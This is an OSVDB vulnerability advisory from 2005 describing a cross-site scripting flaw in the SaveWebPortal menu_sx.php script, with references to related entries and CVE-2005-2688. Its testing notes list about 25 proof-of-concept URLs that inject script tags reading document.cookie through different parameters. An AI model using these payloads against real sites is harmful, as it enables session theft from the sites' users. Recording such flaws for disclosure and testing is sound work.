SaveWebPortal menu_sx.php Multiple Variable XSS

2005-08-21T15:31:56
ID OSVDB:18935
Type osvdb
Reporter rgod(retrogod@aliceposta.it)
Modified 2005-08-21T15:31:56

Description

Vulnerability Description

SaveWebPortal contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate multiple variables upon submission to the 'menu_sx.php' script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

SaveWebPortal contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate multiple variables upon submission to the 'menu_sx.php' script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Manual Testing Notes

http://[target]/saveweb/menu_sx.php?L_InsertNOK3Char=");}</script><script>alert(document.cookie)</script><script> http://[target]/saveweb/menu_sx.php?L_MENUSX_Channels=<script>alert(document.cookie)</script><script> http://[target]/saveweb/menu_sx.php?L_MENUSX_Home=<script>alert(document.cookie)</script><script> http://[target]/saveweb/menu_sx.php?L_MENUSX_Archive=<script>alert(document.cookie)</script> http://[target]/saveweb/menu_sx.php?L_Search=<script>alert(document.cookie)</script> http://[target]/saveweb/menu_sx.php?L_Ok=<script>alert(document.cookie)</script> http://[target]/saveweb/menu_sx.php?IMAGES_Url="><script>alert(document.cookie)</script> http://[target]/saveweb/menu_sx.php?L_MENUSX_Services="><script>alert(document.cookie)</script> http://[target]/saveweb/menu_sx.php?L_MENUSX_Links="><script>alert(document.cookie)</script> http://[target]/saveweb/menu_sx.php?L_MENUSX_Newsletter="><script>alert(document.cookie)</script> http://[target]/saveweb/menu_sx.php?L_MENUSX_Polls="><script>alert(document.cookie)</script> http://[target]/saveweb/menu_sx.php?L_MENUSX_ECards="><script>alert(document.cookie)</script> http://[target]/saveweb/menu_sx.php?L_MENUSX_Downloads="><script>alert(document.cookie)</script> http://[target]/saveweb/menu_sx.php?L_MENUSX_Community="><script>alert(document.cookie)</script> http://[target]/saveweb/menu_sx.php?L_MENUSX_Forum="><script>alert(document.cookie)</script> http://[target]/saveweb/menu_sx.php?L_MENUSX_Chat="><script>alert(document.cookie)</script> http://[target]/saveweb/menu_sx.php?L_MENUSX_Nicknames="><script>alert(document.cookie)</script> http://[target]/saveweb/menu_sx.php?L_MENUSX_Membership="><script>alert(document.cookie)</script> http://[target]/saveweb/menu_sx.php?L_MENUSX_Login="><script>alert(document.cookie)</script> http://[target]/saveweb/menu_sx.php?L_MENUSX_UserProfile="><script>alert(document.cookie)</script> http://[target]/saveweb/menu_sx.php?L_MENUSX_PasswordForgot="><script>alert(document.cookie)</script> http://[target]/saveweb/menu_sx.php?L_MENUSX_Logout="><script>alert(document.cookie)</script> http://[target]/saveweb/menu_sx.php?L_MENUSX_Contacts="><script>alert(document.cookie)</script> http://[target]/saveweb/menu_sx.php?L_MENUSX_Guestbook="><script>alert(document.cookie)</script> http://[target]/saveweb/menu_sx.php?L_MENUSX_ContactUs="><script>alert(document.cookie)</script>

References:

Vendor URL: http://www.circeos.it/ Security Tracker: 1014748 Secunia Advisory ID:16522 Related OSVDB ID: 18932 Related OSVDB ID: 18934 Related OSVDB ID: 18930 Related OSVDB ID: 18931 Related OSVDB ID: 18936 Related OSVDB ID: 18927 Related OSVDB ID: 18928 Related OSVDB ID: 18929 Related OSVDB ID: 18933 Other Advisory URL: http://rgod.altervista.org/save_yourself_from_savewebportal34.html CVE-2005-2688